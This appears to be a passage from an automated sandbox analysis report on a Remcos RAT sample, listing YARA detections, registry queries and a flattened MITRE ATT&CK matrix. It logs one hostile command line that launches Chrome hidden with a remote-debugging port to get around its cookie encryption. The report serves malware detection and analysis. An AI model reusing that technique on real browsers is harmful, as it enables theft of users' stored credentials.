              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000053.00000002.2233264919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000053.00000002.2258901660.0000000001397000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

              Remote Access Functionality

              barindex
              Attempt to bypass Chrome Application-Bound Encryption
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000053.00000002.2233264919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000053.00000002.2258901660.0000000001397000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information21
              Scripting              		Valid Accounts1
              Exploitation for Client Execution              		21
              Scripting              		1
              DLL Side-Loading              		1
              Disable or Modify Tools              		OS Credential Dumping1
              File and Directory Discovery              		Remote ServicesData from Local System1
              Web Service              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter              		1
              DLL Side-Loading              		1
              Extra Window Memory Injection              		1
              Deobfuscate/Decode Files or Information              		LSASS Memory12
              System Information Discovery              		Remote Desktop ProtocolData from Removable Media2
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts4
              PowerShell              		1
              Registry Run Keys / Startup Folder              		11
              Process Injection              		1
              DLL Side-Loading              		Security Account Manager1
              Security Software Discovery              		SMB/Windows Admin SharesData from Network Shared Drive1
              Encrypted Channel              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
              Registry Run Keys / Startup Folder              		1
              File Deletion              		NTDS1
              Process Discovery              		Distributed Component Object ModelInput Capture1
              Remote Access Software              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Extra Window Memory Injection              		LSA Secrets21
              Virtualization/Sandbox Evasion              		SSHKeylogging4
              Non-Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Masquerading              		Cached Domain Credentials1
              Application Window Discovery              		VNCGUI Input Capture15
              Application Layer Protocol              		Data Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
              Virtualization/Sandbox Evasion              		DCSync1
              Remote System Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
              Process Injection              		Proc Filesystem1
              System Network Configuration Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
              Rundll32              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.